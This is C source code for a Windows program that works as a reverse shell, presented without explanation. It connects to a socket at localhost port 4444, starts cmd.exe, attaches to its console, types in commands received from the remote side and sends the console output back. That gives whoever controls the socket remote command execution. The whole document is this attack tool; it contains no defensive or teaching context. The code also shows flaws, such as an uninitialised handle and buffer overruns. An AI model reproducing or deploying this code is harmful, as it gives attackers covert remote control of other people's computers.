Create by compaq #pragma comment(lib, "ws2_32.lib") #define _WIN32_WINNT 0x0501 #include #include #include #include #include #include #include int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow) { WSADATA wsaData; struct sockaddr_in sockAddr; SOCKET sServer; int sockAddrLen; unsigned int i,j; SOCKET sClient; SHELLEXECUTEINFO exeInfo; HANDLE hStdout,hStdin,old, hNewScreenBuffer; SMALL_RECT srctReadRect; SMALL_RECT srctWriteRect; TCHAR temp[10000]; COORD coordBufSize; COORD coordBufCoord; COORD pos = {0,0}; COORD pos1; CHAR_INFO done[160]; SMALL_RECT srctWindow; struct addrinfo *result, hints; unsigned char url[100] = {"localhost"},port[10] = {"4444"}; char temp1[10000]; unsigned char temp2[200]; TCHAR file[50] = {TEXT("C:\\windows\\system32\\cmd.exe")}; CONSOLE_SCREEN_BUFFER_INFO csbiInfo; DWORD bot,bot1; DWORD dwTmp; INPUT_RECORD ir[200]; DWORD len; HANDLE hModuleSnap = INVALID_HANDLE_VALUE; MODULEENTRY32 me32; HANDLE hProcessSnap; HANDLE hProcess; PROCESSENTRY32 pe32; WSAStartup(MAKEWORD(2,2), &wsaData); ZeroMemory(&hints, sizeof (hints)); hints.ai_family = AF_INET; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; hints.ai_flags = AI_PASSIVE; // Resolve the local address and port to be used by the server getaddrinfo("localhost","4444", &hints, &result); sClient = socket(result->ai_family, result->ai_socktype, result->ai_protocol); connect(sClient,result->ai_addr, (int)result->ai_addrlen); exeInfo.cbSize = sizeof(exeInfo); exeInfo.fMask = 0; exeInfo.hwnd = 0; exeInfo.lpVerb = 0; exeInfo.lpFile = TEXT("C:\\windows\\system32\\cmd.exe"); exeInfo.lpParameters = 0; exeInfo.lpDirectory = 0; exeInfo.nShow = SW_SHOW; exeInfo.hInstApp = 0; ShellExecuteEx(&exeInfo); hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); pe32.dwSize = sizeof( PROCESSENTRY32 ); Process32First( hProcessSnap, &pe32 ); do { hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID ); memcpy(temp,pe32.szExeFile,20); if(temp[0] == 'c' && temp[2] == 'm' && temp[4] == 'd' && temp[6] == '.') goto outer; } while( Process32Next( hProcessSnap, &pe32 ) ); outer: AttachConsole(pe32.th32ProcessID); hStdin = GetStdHandle(STD_INPUT_HANDLE); hStdout = GetStdHandle(STD_OUTPUT_HANDLE); GetConsoleScreenBufferInfo(hStdout,&csbiInfo); pos.X = 0; pos.Y = csbiInfo.srWindow.Bottom-80; ReadConsoleOutputCharacter(hStdout,temp,6480,pos,&len); for(;;) { memset(temp1,0x00,sizeof(temp1)); memset(temp2,0x00,sizeof(temp2)); recv(sClient,temp1,100,0); for(i=0;i<100;i++) { temp2[i] = temp1[i]; } if(temp2[0] == 'e' && temp2[1] == 'x' && temp2[2] == 'i' && temp2[3] == 't') goto pl; for(i=0;i<100;i++) { if(temp2[i] == 0x00) { j=i; goto next; } ir[i].EventType = KEY_EVENT; ir[i].Event.KeyEvent.bKeyDown = TRUE; ir[i].Event.KeyEvent.dwControlKeyState = 0; ir[i].Event.KeyEvent.uChar.UnicodeChar = temp2[i]; ir[i].Event.KeyEvent.wRepeatCount = 1; } next: ir[i].EventType = KEY_EVENT; ir[i].Event.KeyEvent.bKeyDown = TRUE; ir[i].Event.KeyEvent.dwControlKeyState = 0; ir[i].Event.KeyEvent.uChar.UnicodeChar = VK_RETURN; ir[i].Event.KeyEvent.wRepeatCount = 1; dwTmp = 0; WriteConsoleInput(hStdin, ir, j+1, &dwTmp); Sleep(3000); GetConsoleScreenBufferInfo(hStdout,&csbiInfo); pos.X = 0; pos.Y = csbiInfo.srWindow.Bottom-80; ReadConsoleOutputCharacter(hStdout,temp,6480,pos,&len); for(i=0;i<6480;i++) { temp1[i] = temp[i]; } send(sClient,temp1,6480,0); } pl: SetConsoleActiveScreenBuffer(old); return 0; }